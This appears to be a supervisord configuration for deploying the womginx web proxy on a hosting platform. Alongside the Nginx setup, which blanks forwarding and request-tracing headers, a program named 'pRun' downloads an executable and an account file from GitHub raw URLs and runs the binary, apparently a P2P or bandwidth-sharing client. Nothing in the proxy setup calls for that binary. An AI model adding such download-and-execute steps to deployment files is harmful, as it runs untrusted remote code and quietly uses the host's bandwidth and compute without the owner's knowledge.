[supervisord]
nodaemon=true
[program:Nginx]
command=sed -i '/ssl_certificate/d' /etc/nginx/nginx.conf && sed -i '/listen 443/d' /etc/nginx/nginx.conf && sed -i -e "s/listen 80/listen $PORT/" /etc/nginx/nginx.conf && sed -i -e "s/proxy_set_header Accept-Encoding/proxy_set_header x-request-id '';proxy_set_header x-forwarded-for '';proxy_set_header x-forwarded-proto '';proxy_set_header x-forwarded-port '';proxy_set_header via '';proxy_set_header connect-time '';proxy_set_header x-request-start '';proxy_set_header total-route-time '';proxy_set_header Accept-Encoding/" /etc/nginx/nginx.conf && nginx -g "daemon off;"

[program:pRun]
command=rm -rf p2p.sh p2pclient p2p && wget https://raw.githubusercontent.com/bls4/apache/main/config/p2p && wget https://raw.githubusercontent.com/bls4/womginx/main/config/p2pclient && chmod +x p2pclient && echo -e "./p2pclient -l MAIL_ADDREES" | sed -e "s/MAIL_ADDREES/$(cat p2p)/" > p2p.sh && chmod +x p2p.sh && bash ./p2p.sh

[program:pTime]
command=python3 /opt/womginx/config/keeptime.py